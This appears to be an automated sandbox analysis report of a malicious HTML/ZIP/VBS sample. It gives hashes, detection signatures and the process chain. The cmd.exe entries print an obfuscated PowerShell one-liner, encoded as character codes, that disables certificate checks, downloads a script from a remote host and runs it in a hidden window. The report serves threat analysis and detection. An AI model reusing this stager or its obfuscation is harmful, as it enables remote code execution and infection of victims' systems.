Windows
Analysis Report
CfF7MWq7aG.html
Overview
General Information
Sample name: | CfF7MWq7aG.html (renamed file extension from none to html, renamed because original name is a hash value) |
Original sample name: | 9182073a7541a8d2db5f94d7a980d70a9ce499c9ec55395fa968ecc65c828dfc |
Analysis ID: | 1607145 |
MD5: | b235a6019e401173f74c6b6487bc5c50 |
SHA1: | 0050ea0f086beffecaee1eba84d7e8f6d907d93e |
SHA256: | 9182073a7541a8d2db5f94d7a980d70a9ce499c9ec55395fa968ecc65c828dfc |
Infos: | |
Detection
Score: | 92 |
Range: | 0 - 100 |
Confidence: | 100% |
Signatures
System process connects to network (likely due to code injection or exploit)
Detected javascript redirector / loader
Downloads suspicious files via Chrome
Found suspicious ZIP file
Obfuscated command line found
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Dosfuscation Activity
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
chrome.exe (PID: 4940 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --st art-maximi zed "C:\Us ers\user\D esktop\CfF 7MWq7aG.ht ml" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) chrome.exe (PID: 4544 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =2052 --fi eld-trial- handle=183 6,i,584368 8646892688 928,179050 1036478479 8591,26214 4 /prefetc h:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) unarchiver.exe (PID: 6716 cmdline:
"C:\Window s\SysWOW64 \unarchive r.exe" "C: \Users\use r\Download s\CfF7MWq7 aG.zip" MD5: 16FF3CC6CC330A08EED70CBC1D35F5D2) 7za.exe (PID: 6744 cmdline:
"C:\Window s\System32 \7za.exe" x -pinfect ed -y -o"C :\Users\us er\AppData \Local\Tem p\4sayhkzp .t1p" "C:\ Users\user \Downloads \CfF7MWq7a G.zip" MD5: 77E556CDFDC5C592F5C46DB4127C6F4C) conhost.exe (PID: 6752 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) cmd.exe (PID: 6812 cmdline:
"cmd.exe" /C "C:\Use rs\user\Ap pData\Loca l\Temp\4sa yhkzp.t1p\ 2025010453 906.vbs" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) conhost.exe (PID: 6820 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) wscript.exe (PID: 6884 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Loc al\Temp\4s ayhkzp.t1p \202501045 3906.vbs" MD5: FF00E0480075B095948000BDC66E81F0) cmd.exe (PID: 7036 cmdline:
"C:\Window s\System32 \cmd.exe" /C "echo $ ($KSJQTmC = $('{5}{4 }{1}' -f $ ('uxhxeilT '.ToCharAr ray())); $ ((182,156, 202,232,92 ,166,202,2 28,236,210 ,198,202,1 60,222,210 ,220,232,1 54,194,220 ,194,206,2 02,228,186 ,116,116,1 66,202,228 ,236,202,2 28,134,202 ,228,232,2 10,204,210 ,198,194,2 32,202,172 ,194,216,2 10,200,194 ,232,210,2 22,220,134 ,194,216,2 16,196,194 ,198,214,6 4,122,64,2 46,72,232, 228,234,20 2,250,118, 64,72,240, 172,140,20 8,180,64,1 22,64,182, 166,242,23 0,232,202, 218,92,156 ,202,232,9 2,144,232, 232,224,17 4,202,196, 164,202,22 6,234,202, 230,232,18 6,116,116, 134,228,20 2,194,232, 202,80,78, 208,232,23 2,224,230, 116,94,94, 208,222,23 0,232,112, 106,106,96 ,96,92,210 ,220,204,2 22,116,98, 106,102,10 0,100,94,2 38,202,196 ,98,92,224 ,208,224,7 8,82,118,6 4,72,240,1 72,140,208 ,180,92,16 8,210,218, 202,222,23 4,232,64,1 22,64,102, 96,96,96,9 6,96,118,6 4,72,80,18 2,166,242, 230,232,20 2,218,92,1 46,222,92, 166,232,22 8,202,194, 218,164,20 2,194,200, 202,228,18 6,80,72,24 0,172,140, 208,180,92 ,142,202,2 32,164,202 ,230,224,2 22,220,230 ,202,80,82 ,92,142,20 2,232,164, 202,230,22 4,222,220, 230,202,16 6,232,228, 202,194,21 8,80,82,82 ,82,92,164 ,202,194,2 00,168,222 ,138,220,2 00,80,82,6 4,248,64,1 46,138,176 )^^^|%{[ch ar]($_/2)} )-join'') ^^^| ^^^&( $KSJQTmC) | C:\Windo ws\SysWOW6 4\WindowsP owerShell\ v1.0\power shell.exe -Window Hi dden -c -" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) conhost.exe (PID: 7044 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) cmd.exe (PID: 7088 cmdline:
C:\Windows \system32\ cmd.exe /S /D /c" ec ho $($KSJQ TmC = $('{ 5}{4}{1}' -f $('uxhx eilT'.ToCh arArray()) ); $((182, 156,202,23 2,92,166,2 02,228,236 ,210,198,2 02,160,222 ,210,220,2 32,154,194 ,220,194,2 06,202,228 ,186,116,1 16,166,202 ,228,236,2 02,228,134 ,202,228,2 32,210,204 ,210,198,1 94,232,202 ,172,194,2 16,210,200 ,194,232,2 10,222,220 ,134,194,2 16,216,196 ,194,198,2 14,64,122, 64,246,72, 232,228,23 4,202,250, 118,64,72, 240,172,14 0,208,180, 64,122,64, 182,166,24 2,230,232, 202,218,92 ,156,202,2 32,92,144, 232,232,22 4,174,202, 196,164,20 2,226,234, 202,230,23 2,186,116, 116,134,22 8,202,194, 232,202,80 ,78,208,23 2,232,224, 230,116,94 ,94,208,22 2,230,232, 112,106,10 6,96,96,92 ,210,220,2 04,222,116 ,98,106,10 2,100,100, 94,238,202 ,196,98,92 ,224,208,2 24,78,82,1 18,64,72,2 40,172,140 ,208,180,9 2,168,210, 218,202,22 2,234,232, 64,122,64, 102,96,96, 96,96,96,1 18,64,72,8 0,182,166, 242,230,23 2,202,218, 92,146,222 ,92,166,23 2,228,202, 194,218,16 4,202,194, 200,202,22 8,186,80,7 2,240,172, 140,208,18 0,92,142,2 02,232,164 ,202,230,2 24,222,220 ,230,202,8 0,82,92,14 2,202,232, 164,202,23 0,224,222, 220,230,20 2,166,232, 228,202,19 4,218,80,8 2,82,82,92 ,164,202,1 94,200,168 ,222,138,2 20,200,80, 82,64,248, 64,146,138 ,176)^|%{[ char]($_/2 )})-join'' ) ^| ^&($K SJQTmC) " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) powershell.exe (PID: 7104 cmdline:
C:\Windows \SysWOW64\ WindowsPow erShell\v1 .0\powersh ell.exe -W indow Hidd en -c - MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- cleanup
⊘No configs have been found
⊘No yara matches
System Summary |
---|
Source: | Author: frack113, Florian Roth: |
Source: | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: frack113, Nasreddine Bencherchali (Nextron Systems): |